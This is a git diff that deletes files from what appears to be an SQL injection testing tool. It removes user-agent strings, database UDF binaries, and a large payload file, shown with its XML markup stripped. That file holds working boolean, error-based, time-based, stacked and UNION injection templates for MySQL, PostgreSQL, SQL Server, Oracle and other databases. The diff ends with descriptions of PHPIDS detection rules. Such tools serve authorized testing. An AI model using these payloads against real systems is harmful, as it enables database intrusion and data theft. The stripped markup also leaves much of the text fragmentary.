-Opera/9.64 (X11; Linux x86_64; U; de) Presto/2.1.1 -Opera/9.64 (X11; Linux x86_64; U; en) Presto/2.1.1 -Opera/9.64 (X11; Linux x86_64; U; en-GB) Presto/2.1.1 -Opera/9.64 (X11; Linux x86_64; U; hr) Presto/2.1.1 -Opera/9.64 (X11; Linux x86_64; U; pl) Presto/2.1.1 -Opera/9.64(Windows NT 5.1; U; en) Presto/2.1.1 -Opera/9.70 (Linux i686 ; U; ; en) Presto/2.2.1 -Opera/9.70 (Linux i686 ; U; ; en) Presto/2.2.1 -Opera/9.70 (Linux i686 ; U; en) Presto/2.2.0 -Opera/9.70 (Linux i686 ; U; en) Presto/2.2.1 -Opera/9.70 (Linux i686 ; U; en-us) Presto/2.2.0 
-Opera/9.70 (Linux i686 ; U; zh-cn) Presto/2.2.0 -Opera/9.70 (Linux ppc64 ; U; en) Presto/2.2.1 -Opera/9.80 (J2ME/MIDP; Opera Mini/5.0 (Windows; U; Windows NT 5.1; en) AppleWebKit/886; U; en) Presto/2.4.15 -Opera/9.80 (Linux i686; U; en) Presto/2.5.22 Version/10.51 -Opera/9.80 (Macintosh; Intel Mac OS X; U; nl) Presto/2.6.30 Version/10.61 -Opera/9.80 (Windows 98; U; de) Presto/2.6.30 Version/10.61 -Opera/9.80 (Windows NT 5.1; U; cs) Presto/2.2.15 Version/10.10 -Opera/9.80 (Windows NT 5.1; U; de) Presto/2.2.15 Version/10.10 -Opera/9.80 (Windows NT 5.1; U; it) Presto/2.7.62 Version/11.00 -Opera/9.80 (Windows NT 5.1; U; pl) Presto/2.6.30 Version/10.62 -Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.2.15 Version/10.00 -Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.22 Version/10.50 -Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.7.39 Version/11.00 -Opera/9.80 (Windows NT 5.1; U; zh-cn) Presto/2.2.15 Version/10.00 -Opera/9.80 (Windows NT 5.2; U; en) Presto/2.2.15 Version/10.00 -Opera/9.80 (Windows NT 5.2; U; en) Presto/2.6.30 Version/10.63 -Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51 -Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.6.30 Version/10.61 -Opera/9.80 (Windows NT 5.2; U; zh-cn) Presto/2.6.30 Version/10.63 -Opera/9.80 (Windows NT 6.0; U; Gecko/20100115; pl) Presto/2.2.15 Version/10.10 -Opera/9.80 (Windows NT 6.0; U; cs) Presto/2.5.22 Version/10.51 -Opera/9.80 (Windows NT 6.0; U; de) Presto/2.2.15 Version/10.00 -Opera/9.80 (Windows NT 6.0; U; en) Presto/2.2.15 Version/10.00 -Opera/9.80 (Windows NT 6.0; U; en) Presto/2.2.15 Version/10.10 -Opera/9.80 (Windows NT 6.0; U; en) Presto/2.7.39 Version/11.00 -Opera/9.80 (Windows NT 6.0; U; it) Presto/2.6.30 Version/10.61 -Opera/9.80 (Windows NT 6.0; U; nl) Presto/2.6.30 Version/10.60 -Opera/9.80 (Windows NT 6.0; U; zh-cn) Presto/2.5.22 Version/10.50 -Opera/9.80 (Windows NT 6.1; U; cs) Presto/2.2.15 Version/10.00 -Opera/9.80 (Windows NT 6.1; U; de) Presto/2.2.15 Version/10.00 -Opera/9.80 (Windows NT 6.1; U; de) Presto/2.2.15 Version/10.10 -Opera/9.80 (Windows NT 6.1; U; en) Presto/2.2.15 Version/10.00 -Opera/9.80 (Windows NT 6.1; U; en) Presto/2.5.22 Version/10.51 -Opera/9.80 (Windows NT 6.1; U; en) Presto/2.6.30 Version/10.61 -Opera/9.80 (Windows NT 6.1; U; en-GB) Presto/2.7.62 Version/11.00 -Opera/9.80 (Windows NT 6.1; U; fi) Presto/2.2.15 Version/10.00 -Opera/9.80 (Windows NT 6.1; U; fr) Presto/2.5.24 Version/10.52 -Opera/9.80 (Windows NT 6.1; U; ja) Presto/2.5.22 Version/10.50 -Opera/9.80 (Windows NT 6.1; U; pl) Presto/2.6.31 Version/10.70 -Opera/9.80 (Windows NT 6.1; U; pl) Presto/2.7.62 Version/11.00 -Opera/9.80 (Windows NT 6.1; U; sk) Presto/2.6.22 Version/10.50 -Opera/9.80 (Windows NT 6.1; U; zh-cn) Presto/2.2.15 Version/10.00 -Opera/9.80 (Windows NT 6.1; U; zh-cn) Presto/2.5.22 Version/10.50 -Opera/9.80 (Windows NT 6.1; U; zh-cn) Presto/2.6.30 Version/10.61 -Opera/9.80 (Windows NT 6.1; U; zh-cn) Presto/2.6.37 Version/11.00 -Opera/9.80 (Windows NT 6.1; U; zh-tw) Presto/2.5.22 Version/10.50 -Opera/9.80 (X11; Linux i686; U; Debian; pl) Presto/2.2.15 Version/10.00 -Opera/9.80 (X11; Linux i686; U; de) Presto/2.2.15 Version/10.00 -Opera/9.80 (X11; Linux i686; U; en) Presto/2.2.15 Version/10.00 -Opera/9.80 (X11; Linux i686; U; en) Presto/2.5.27 Version/10.60 -Opera/9.80 (X11; Linux i686; U; en-GB) Presto/2.2.15 Version/10.00 -Opera/9.80 (X11; Linux i686; U; en-GB) Presto/2.5.24 Version/10.53 -Opera/9.80 (X11; Linux i686; U; es-ES) Presto/2.6.30 Version/10.61 -Opera/9.80 (X11; Linux i686; U; it) Presto/2.5.24 Version/10.54 -Opera/9.80 
(X11; Linux i686; U; nb) Presto/2.2.15 Version/10.00 -Opera/9.80 (X11; Linux i686; U; pl) Presto/2.2.15 Version/10.00 -Opera/9.80 (X11; Linux i686; U; pl) Presto/2.6.30 Version/10.61 -Opera/9.80 (X11; Linux i686; U; pt-BR) Presto/2.2.15 Version/10.00 -Opera/9.80 (X11; Linux i686; U; ru) Presto/2.2.15 Version/10.00 -Opera/9.80 (X11; Linux x86_64; U; de) Presto/2.2.15 Version/10.00 -Opera/9.80 (X11; Linux x86_64; U; en) Presto/2.2.15 Version/10.00 -Opera/9.80 (X11; Linux x86_64; U; en-GB) Presto/2.2.15 Version/10.01 -Opera/9.80 (X11; Linux x86_64; U; it) Presto/2.2.15 Version/10.10 -Opera/9.80 (X11; Linux x86_64; U; pl) Presto/2.7.62 Version/11.00 -Opera/9.80 (X11; U; Linux i686; en-US; rv:1.9.2.3) Presto/2.2.15 Version/10.10 -Opera/9.99 (Windows NT 5.1; U; pl) Presto/9.9.9 diff --git a/txt/wordlist.zip b/txt/wordlist.zip deleted file mode 100644 index 9b018630f4f..00000000000 Binary files a/txt/wordlist.zip and /dev/null differ diff --git a/udf/mysql/linux/32/lib_mysqludf_sys.so b/udf/mysql/linux/32/lib_mysqludf_sys.so deleted file mode 100644 index 9eb5e82badd..00000000000 Binary files a/udf/mysql/linux/32/lib_mysqludf_sys.so and /dev/null differ diff --git a/udf/mysql/linux/64/lib_mysqludf_sys.so b/udf/mysql/linux/64/lib_mysqludf_sys.so deleted file mode 100644 index 9c6999ecd10..00000000000 Binary files a/udf/mysql/linux/64/lib_mysqludf_sys.so and /dev/null differ diff --git a/udf/mysql/windows/32/lib_mysqludf_sys.dll b/udf/mysql/windows/32/lib_mysqludf_sys.dll deleted file mode 100644 index a2196a25e9d..00000000000 Binary files a/udf/mysql/windows/32/lib_mysqludf_sys.dll and /dev/null differ diff --git a/udf/mysql/windows/64/lib_mysqludf_sys.dll b/udf/mysql/windows/64/lib_mysqludf_sys.dll deleted file mode 100644 index 3de734fc9f4..00000000000 Binary files a/udf/mysql/windows/64/lib_mysqludf_sys.dll and /dev/null differ diff --git a/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so b/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so deleted file mode 100644 index ce33ad34e69..00000000000 Binary files a/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so and /dev/null differ diff --git a/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so b/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so deleted file mode 100755 index eb20b094ea8..00000000000 Binary files a/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so and /dev/null differ diff --git a/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so b/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so deleted file mode 100755 index 9e07a823ff4..00000000000 Binary files a/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so and /dev/null differ diff --git a/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so b/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so deleted file mode 100755 index ddf07c98e2b..00000000000 Binary files a/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so and /dev/null differ diff --git a/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so b/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so deleted file mode 100755 index 02e7e09bac7..00000000000 Binary files a/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so and /dev/null differ diff --git a/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so b/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so deleted file mode 100755 index 5dd842a4b5b..00000000000 Binary files a/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so and /dev/null differ diff --git a/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so 
b/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so deleted file mode 100755 index 80eec1a745a..00000000000 Binary files a/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so and /dev/null differ
diff --git a/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so b/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so deleted file mode 100755 index 7c29ff7a350..00000000000 Binary files a/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so and /dev/null differ
diff --git a/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll b/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll deleted file mode 100755 index 342d45a081e..00000000000 Binary files a/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll and /dev/null differ
diff --git a/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll b/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll deleted file mode 100755 index 9113b56c27f..00000000000 Binary files a/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll and /dev/null differ
diff --git a/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll b/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll deleted file mode 100755 index 43ba07ad666..00000000000 Binary files a/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll and /dev/null differ
diff --git a/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll b/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll deleted file mode 100644 index 5df72e78a79..00000000000 Binary files a/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll and /dev/null differ
diff --git a/xml/banner/cookie.xml b/xml/banner/cookie.xml deleted file mode 100644 index c9e34d2ceaa..00000000000 --- a/xml/banner/cookie.xml +++ /dev/null @@ -1,37 +0,0 @@ [37 deleted XML lines; markup stripped in extraction]
diff --git a/xml/banner/generic.xml b/xml/banner/generic.xml deleted file mode 100644 index 8e3b8105784..00000000000 --- a/xml/banner/generic.xml +++ /dev/null @@ -1,138 +0,0 @@ [138 deleted XML lines; markup stripped in extraction]
diff --git a/xml/banner/mysql.xml b/xml/banner/mysql.xml deleted file mode 100644 index 2daf1d1adea..00000000000 --- a/xml/banner/mysql.xml +++ /dev/null @@ -1,42 +0,0 @@ [42 deleted XML lines; markup stripped in extraction]
diff --git a/xml/banner/postgresql.xml b/xml/banner/postgresql.xml deleted file mode 100644 index 3ae42c3a38f..00000000000 --- a/xml/banner/postgresql.xml +++ /dev/null @@ -1,25 +0,0 @@ [25 deleted XML lines; markup stripped in extraction]
diff --git a/xml/banner/x-powered-by.xml b/xml/banner/x-powered-by.xml deleted file mode 100644 index 0ca88545922..00000000000 --- a/xml/banner/x-powered-by.xml +++ /dev/null @@ -1,29 +0,0 @@ [29 deleted XML lines; markup stripped in extraction]
diff --git a/xml/errors.xml b/xml/errors.xml deleted file mode 100644 index d6bfb2d2115..00000000000 --- a/xml/errors.xml +++ /dev/null @@ -1,98 +0,0 @@ [98 deleted XML lines; markup stripped in extraction]
diff --git a/xml/livetests.xml b/xml/livetests.xml deleted file mode 100644 index 5a27d28e35a..00000000000 --- a/xml/livetests.xml +++ /dev/null @@ -1,3429 +0,0 @@ [3429 deleted XML lines; markup stripped in extraction]
diff --git a/xml/payloads.xml b/xml/payloads.xml deleted file mode 100644 index 8f66520614b..00000000000 --- a/xml/payloads.xml +++ /dev/null @@ -1,4154 +0,0 @@ [4154 deleted XML lines; markup stripped in extraction, only element text values remain below]
- - - - - - - - 3 - 1 - 1,2 - 1 - ) - - - - - 4 - 1 - 1,2 - 2 - ') - - - - - 3 - 1 - 1,2 - 2 - ' - - - - - 5 - 1 - 1,2 - 4 - " - - - - - - - 1 - 1 - 1,2 - 1 - ) - AND ([RANDNUM]=[RANDNUM] - - - - 2 - 1 - 1,2 - 1 - )) - AND 
(([RANDNUM]=[RANDNUM] - - - - 3 - 1 - 1,2 - 1 - ))) - AND ((([RANDNUM]=[RANDNUM] - - - - 1 - 0 - 1,2,3 - 1 - - - - - - 1 - 1 - 1,2 - 2 - ') - AND ('[RANDSTR]'='[RANDSTR] - - - - 2 - 1 - 1,2 - 2 - ')) - AND (('[RANDSTR]'='[RANDSTR] - - - - 3 - 1 - 1,2 - 2 - '))) - AND ((('[RANDSTR]'='[RANDSTR] - - - - 1 - 1 - 1,2 - 2 - ' - AND '[RANDSTR]'='[RANDSTR] - - - - 2 - 1 - 1,2 - 3 - ') - AND ('[RANDSTR]' LIKE '[RANDSTR] - - - - 3 - 1 - 1,2 - 3 - ')) - AND (('[RANDSTR]' LIKE '[RANDSTR] - - - - 4 - 1 - 1,2 - 3 - '))) - AND ((('[RANDSTR]' LIKE '[RANDSTR] - - - - 2 - 1 - 1,2 - 3 - ' - AND '[RANDSTR]' LIKE '[RANDSTR] - - - - 2 - 1 - 1,2 - 4 - ") - AND ("[RANDSTR]"="[RANDSTR] - - - - 3 - 1 - 1,2 - 4 - ")) - AND (("[RANDSTR]"="[RANDSTR] - - - - 4 - 1 - 1,2 - 4 - "))) - AND ((("[RANDSTR]"="[RANDSTR] - - - - 2 - 1 - 1,2 - 4 - " - AND "[RANDSTR]"="[RANDSTR] - - - - 3 - 1 - 1,2 - 5 - ") - AND ("[RANDSTR]" LIKE "[RANDSTR] - - - - 4 - 1 - 1,2 - 5 - ")) - AND (("[RANDSTR]" LIKE "[RANDSTR] - - - - 5 - 1 - 1,2 - 5 - "))) - AND ((("[RANDSTR]" LIKE "[RANDSTR] - - - - 3 - 1 - 1,2 - 5 - " - AND "[RANDSTR]" LIKE "[RANDSTR] - - - - 2 - 1 - 1,2 - 2 - %') - AND ('%'=' - - - - 3 - 1 - 1,2 - 2 - %')) - AND (('%'=' - - - - 4 - 1 - 1,2 - 2 - %'))) - AND ((('%'=' - - - - 1 - 1 - 1,2 - 2 - %' - AND '%'=' - - - - 5 - 1 - 1,2 - 2 - %00') - AND ('[RANDSTR]'='[RANDSTR] - - - - 4 - 1 - 1,2 - 2 - %00' - AND '[RANDSTR]'='[RANDSTR] - - - - - - - 5 - 1 - 1,2 - 2 - ') WHERE [RANDNUM]=[RANDNUM] - -- - - - - 5 - 1 - 1,2 - 2 - ") WHERE [RANDNUM]=[RANDNUM] - -- - - - - 4 - 1 - 1,2 - 1 - ) WHERE [RANDNUM]=[RANDNUM] - -- - - - - 4 - 1 - 1,2 - 2 - ' WHERE [RANDNUM]=[RANDNUM] - -- - - - - 5 - 1 - 1,2 - 4 - " WHERE [RANDNUM]=[RANDNUM] - -- - - - - 4 - 1 - 1,2 - 1 - WHERE [RANDNUM]=[RANDNUM] - -- - - - - - - 5 - 1 - 1 - 2 - '||(SELECT '[RANDSTR]' FROM DUAL WHERE [RANDNUM]=[RANDNUM] - )||' - - - - 5 - 1 - 1 - 2 - '||(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM] - )||' - - - - 5 - 1 - 1 - 1 - '+(SELECT [RANDSTR] WHERE [RANDNUM]=[RANDNUM] - )+' - - - - 5 - 1 - 1 - 2 - '+(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM] - )+' - - - - - - 4 - 1 - 1 - 2 - ' IN BOOLEAN MODE) - # - - - - - - AND boolean-based blind - WHERE or HAVING clause - 1 - 1 - 1 - 1 - 1 - AND [INFERENCE] - - AND [RANDNUM]=[RANDNUM] - - - AND [RANDNUM]=[RANDNUM1] - - - - - AND boolean-based blind - WHERE or HAVING clause (MySQL comment) - 1 - 4 - 1 - 1 - 1 - AND [INFERENCE] - - AND [RANDNUM]=[RANDNUM] - # - - - AND [RANDNUM]=[RANDNUM1] - -
    - MySQL -
    -
    - - - AND boolean-based blind - WHERE or HAVING clause (Generic comment) - 1 - 4 - 1 - 1 - 1 - AND [INFERENCE] - - AND [RANDNUM]=[RANDNUM] - -- - - - AND [RANDNUM]=[RANDNUM1] - - - - - OR boolean-based blind - WHERE or HAVING clause - 1 - 2 - 3 - 1 - 2 - OR ([INFERENCE]) - - OR ([RANDNUM]=[RANDNUM]) - - - OR ([RANDNUM]=[RANDNUM1]) - - - - - OR boolean-based blind - WHERE or HAVING clause (MySQL comment) - 1 - 3 - 3 - 1 - 2 - OR ([INFERENCE]) - - OR ([RANDNUM]=[RANDNUM]) - # - - - OR ([RANDNUM]=[RANDNUM1]) - -
    - MySQL -
    -
    - - - OR boolean-based blind - WHERE or HAVING clause (Generic comment) - 1 - 3 - 3 - 1 - 2 - OR ([INFERENCE]) - - OR ([RANDNUM]=[RANDNUM]) - -- - - - OR ([RANDNUM]=[RANDNUM1]) - - - - - MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) - 1 - 3 - 1 - 1 - 1 - RLIKE IF([INFERENCE],[ORIGVALUE],0x28) - - RLIKE IF([RANDNUM]=[RANDNUM],[ORIGVALUE],0x28) - - - RLIKE IF([RANDNUM]=[RANDNUM1],[ORIGVALUE],0x28) - -
    - MySQL -
    -
[Boolean-based blind tests — parameter replace (original value): generic (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)); MySQL MAKE_SET([INFERENCE],[ORIGVALUE]), ELT([INFERENCE],[ORIGVALUE]) and ([INFERENCE])*[ORIGVALUE]; MySQL >= 5.0 and < 5.0 variants that error through INFORMATION_SCHEMA.CHARACTER_SETS or mysql.db; PostgreSQL GENERATE_SERIES; Microsoft SQL Server/Sybase via master..sysdatabases; Oracle CASE ... FROM DUAL; Microsoft Access IIF([INFERENCE],[ORIGVALUE],1/0); SAP MaxDB CASE ... ELSE NULL END.]
[Boolean-based blind tests — GROUP BY and ORDER BY clauses: leading-comma CASE WHEN ([INFERENCE]) expressions (generic 1/(SELECT 0) error variant, original-value variant, MySQL >= 5.0 and < 5.0, Microsoft SQL Server/Sybase ORDER BY only, Oracle FROM DUAL, Microsoft Access IIF).]
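The boolean-based blind family above never reads data directly: it injects a condition and decides whether it held by comparing the response against known true ([RANDNUM]=[RANDNUM]) and false ([RANDNUM]=[RANDNUM1]) baselines. A minimal sketch of that comparison loop in Python, assuming a hypothetical vulnerable GET parameter id on http://target.local/item (the endpoint, parameter name and example condition are illustrative, not taken from the diff):

    import requests

    TARGET = "http://target.local/item"   # hypothetical vulnerable endpoint

    def page(payload):
        """Fetch the page with the given expression appended to the 'id' parameter."""
        return requests.get(TARGET, params={"id": "1 " + payload}, timeout=10).text

    def condition_holds(condition):
        """Emulate the AND [INFERENCE] vector by comparing true/false baselines."""
        true_page = page("AND 1=1")           # behaves like [RANDNUM]=[RANDNUM]
        false_page = page("AND 1=2")          # behaves like [RANDNUM]=[RANDNUM1]
        test_page = page("AND " + condition)  # AND [INFERENCE]
        return test_page == true_page and test_page != false_page

    if __name__ == "__main__":
        # Example inference: is the first character of the current user above 'm'?
        print(condition_holds("ASCII(SUBSTRING(CURRENT_USER(),1,1))>109"))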
[Stacked conditional-error blind queries: MySQL "; IF(([INFERENCE]),SELECT [RANDNUM],DROP FUNCTION [RANDSTR])#", Microsoft SQL Server/Sybase "; IF([INFERENCE]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]-- " and PostgreSQL "; SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)-- ".]
[Error-based tests, WHERE or HAVING clause (AND and OR vectors): MySQL >= 5.0 duplicate-key trick (SELECT COUNT(*),CONCAT(...,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x), MySQL >= 5.1 EXTRACTVALUE and UPDATEXML, MySQL >= 4.1 ROW(...) comparison, MySQL OR 1 GROUP BY ... HAVING MIN(0); PostgreSQL CAST('...'||([QUERY])::text||'...' AS NUMERIC); Microsoft SQL Server/Sybase CONVERT(INT,...) and IN ((...)); Oracle XMLType, UTL_INADDR.GET_HOST_ADDRESS (>= 8.1.6) and CTXSYS.DRITHSX.SN; Firebird string comparison against RDB$DATABASE. Each wraps the [QUERY] result between [DELIMITER_START] and [DELIMITER_STOP] and recovers it with the regular expression [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP].]
[Error-based tests — parameter replace: MySQL >= 5.0 duplicate-key, MySQL >= 5.1 EXTRACTVALUE and UPDATEXML, PostgreSQL CAST ... AS NUMERIC, Microsoft SQL Server/Sybase CONVERT(INT,...) and an integer-column variant, Oracle XMLType, Firebird; same delimiter/regex extraction as above.]
[Error-based tests — GROUP BY and ORDER BY clauses: leading-comma variants of the MySQL >= 5.0 and >= 5.1, PostgreSQL, Microsoft SQL Server/Sybase (ORDER BY only) and Oracle vectors above, with the same delimiter/regex extraction.]
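All of the error-based vectors share one extraction step: the [QUERY] result is sandwiched between [DELIMITER_START] and [DELIMITER_STOP] inside a deliberately failing expression, and the value is pulled back out of the error text with the regular expression [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]. A sketch of that instantiate-and-parse step using the MySQL >= 5.1 EXTRACTVALUE template; the delimiter strings, the random number and the simulated error text are illustrative, and the HTTP layer is omitted:

    import re

    # Illustrative values; the tool generates random delimiters and numbers at runtime.
    TEMPLATE = "AND EXTRACTVALUE([RANDNUM],CONCAT('\\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))"
    START, STOP = "~sTaRt~", "~sToP~"

    def build_payload(query, randnum=1337):
        """Fill the template placeholders for a given sub-query."""
        return (TEMPLATE.replace("[RANDNUM]", str(randnum))
                        .replace("[QUERY]", query)
                        .replace("[DELIMITER_START]", START)
                        .replace("[DELIMITER_STOP]", STOP))

    def parse_response(body):
        """Recover the sub-query result from the DBMS error text."""
        match = re.search(re.escape(START) + r"(?P<result>.*?)" + re.escape(STOP), body)
        return match.group("result") if match else None

    if __name__ == "__main__":
        print(build_payload("SELECT version()"))
        # Simulated error text as it might come back from the server:
        print(parse_response("XPATH syntax error: '\\~sTaRt~5.7.44~sToP~'"))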
[Inline query tests (full parameter replace): MySQL (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')), PostgreSQL '||([QUERY])::text||', Microsoft SQL Server/Sybase '+([QUERY])+', Oracle ... FROM DUAL, SQLite '||([QUERY])||', Firebird ... FROM RDB$DATABASE; the result is read back from the page with the same delimiter regex.]
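Unlike the AND/OR vectors, the inline-query tests replace the whole parameter value, so the delimited result is reflected in the ordinary page output rather than in an error message. A short sketch of building such a value from the MySQL template, with an assumed cat parameter and made-up delimiters:

    from urllib.parse import urlencode

    START, STOP = "~qStArT~", "~qStOp~"   # illustrative delimiters

    def inline_value(query):
        """MySQL-style inline vector: (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))."""
        return "(SELECT CONCAT('%s',(%s),'%s'))" % (START, query, STOP)

    if __name__ == "__main__":
        # The crafted expression takes the place of the original parameter value entirely.
        print(urlencode({"cat": inline_value("SELECT database()")}))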
[Stacked-query tests (delay after statement termination): MySQL > 5.0.11 "; SELECT SLEEP([SLEEPTIME])" and MySQL < 5.0.12 BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')) heavy query; PostgreSQL > 8.1 PG_SLEEP, GENERATE_SERIES heavy query and < 8.2 glibc sleep() UDF (Linux); Microsoft SQL Server/Sybase "; WAITFOR DELAY '0:0:[SLEEPTIME]'"; Oracle DBMS_PIPE.RECEIVE_MESSAGE, ALL_USERS cross-join heavy query, DBMS_LOCK.SLEEP and USER_LOCK.SLEEP; SQLite > 2.0 RANDOMBLOB heavy query; Firebird >= 2.0 RDB$ system-table cross-join heavy query.]
[Time-based blind tests, AND vector (plain and comment-terminated variants): MySQL > 5.0.11 SLEEP and < 5.0.12 BENCHMARK; PostgreSQL > 8.1 PG_SLEEP and GENERATE_SERIES heavy query; Microsoft SQL Server/Sybase WAITFOR DELAY and sysusers cross-join heavy query; Oracle DBMS_PIPE.RECEIVE_MESSAGE and ALL_USERS cross-join heavy query; SQLite > 2.0 RANDOMBLOB heavy query; Firebird >= 2.0, SAP MaxDB (DOMAIN.DOMAINS/COLUMNS/TABLES) and IBM DB2 (SYSIBM.SYSTABLES) heavy queries.]
[Time-based blind tests, OR vector: the same MySQL, PostgreSQL, Microsoft SQL Server/Sybase, Oracle, SQLite, Firebird, SAP MaxDB and IBM DB2 delay primitives as the AND variants above, injected as OR [RANDNUM]=... conditions.]
[Time-based blind tests — parameter replace: MySQL SLEEP, BENCHMARK, ([INFERENCE])*SLEEP([SLEEPTIME]), MAKE_SET and ELT; PostgreSQL PG_SLEEP and GENERATE_SERIES; Microsoft SQL Server/Sybase WAITFOR DELAY and sysusers heavy query; Oracle DBMS_PIPE.RECEIVE_MESSAGE and ALL_USERS heavy query; SQLite RANDOMBLOB; Firebird, SAP MaxDB and IBM DB2 heavy queries.]
[Time-based blind tests — GROUP BY and ORDER BY clauses: leading-comma CASE WHEN ([INFERENCE]) expressions using MySQL >= 5.0.11 SLEEP and < 5.0.12 BENCHMARK, PostgreSQL PG_SLEEP and GENERATE_SERIES, Microsoft SQL Server/Sybase WAITFOR DELAY and sysusers heavy query (ORDER BY only), and Oracle DBMS_PIPE.RECEIVE_MESSAGE and ALL_USERS heavy query.]
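Every time-based test is verified the same way: the request is timed and the inference counts as true when the response arrives at least [SLEEPTIME] seconds late. A minimal sketch of that measurement, reusing the hypothetical endpoint from the earlier sketch and MySQL's SLEEP()-based IF vector:

    import time
    import requests

    TARGET = "http://target.local/item"   # hypothetical vulnerable endpoint
    SLEEPTIME = 5                          # stands in for [SLEEPTIME]

    def delayed(condition):
        """Emulate AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])."""
        payload = "1 AND 1234=IF((%s),SLEEP(%d),1234)" % (condition, SLEEPTIME)
        start = time.monotonic()
        requests.get(TARGET, params={"id": payload}, timeout=SLEEPTIME + 30)
        return time.monotonic() - start >= SLEEPTIME

    if __name__ == "__main__":
        print(delayed("ASCII(SUBSTRING(CURRENT_USER(),1,1))>109"))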
[UNION query tests built around the [UNION] vector: MySQL variants terminated with # and generic variants terminated with -- , each offered with [CHAR], NULL and [RANDNUM] column fillers, for a custom [COLSTART] to [COLSTOP] range and for the fixed ranges 1 to 10, 11 to 20, 21 to 30, 31 to 40 and 41 to 50 columns.]
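The UNION tests determine the number of columns by appending UNION ALL SELECT with a growing list of NULL (or [CHAR]/[RANDNUM]) fillers, covering 1 to 50 columns in steps of ten or a custom [COLSTART] to [COLSTOP] range. A sketch of that probing loop, again against the hypothetical endpoint used above; the similarity threshold is an illustrative heuristic, not the tool's actual comparison logic:

    import difflib
    import requests

    TARGET = "http://target.local/item"   # hypothetical vulnerable endpoint

    def union_column_count(colstart=1, colstop=10, filler="NULL"):
        """Probe 'UNION ALL SELECT NULL[,NULL...]' widths until the page looks healthy again."""
        baseline = requests.get(TARGET, params={"id": "1"}, timeout=10).text
        for width in range(colstart, colstop + 1):
            payload = "1 UNION ALL SELECT %s-- -" % ",".join([filler] * width)
            body = requests.get(TARGET, params={"id": payload}, timeout=10).text
            # Crude check: with the right column count the original content reappears.
            if difflib.SequenceMatcher(None, baseline, body).quick_ratio() > 0.95:
                return width
        return None

    if __name__ == "__main__":
        print(union_column_count())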
diff --git a/xml/phpids_rules.xml b/xml/phpids_rules.xml deleted file mode 100644 index fa3690fa049..00000000000 --- a/xml/phpids_rules.xml +++ /dev/null @@ -1,199 +0,0 @@
[Deleted PHPIDS filter rules (regular-expression bodies stripped); ids, descriptions and impact scores: 40 Detects MySQL comments, conditions and ch(a)r injections (impact 6); 41 Detects conditional SQL injection attempts (6); 42-43 Detects classic SQL injection probings 1/2 and 2/2 (6); 44-46 Detects basic SQL authentication bypass attempts 1/3 to 3/3 (7); 47 Detects concatenated basic SQL injection and SQLLFI attempts (5); 48-49 Detects chained SQL injection attempts 1/2 and 2/2 (6); 50 Detects SQL benchmark and sleep injection attempts including conditional queries (4); 51 Detects MySQL UDF injection and other data/structure manipulation attempts (6); 52 Detects MySQL charset switch and MSSQL DoS attempts (6); 53 Detects MySQL and PostgreSQL stored procedure/function injections (7); 54 Detects Postgres pg_sleep injection, waitfor delay attacks and database shutdown attempts (5); 55 Detects MSSQL code execution and information gathering attempts (5); 56 Detects MATCH AGAINST, MERGE, EXECUTE IMMEDIATE and HAVING injections (5); 57 Detects MySQL comment-/space-obfuscated injections (5); 70 finds basic MongoDB SQL injection attempts (4). Rules 40-47 are tagged sqli, id, lfi; 48-57 sqli, id; 70 sqli.]
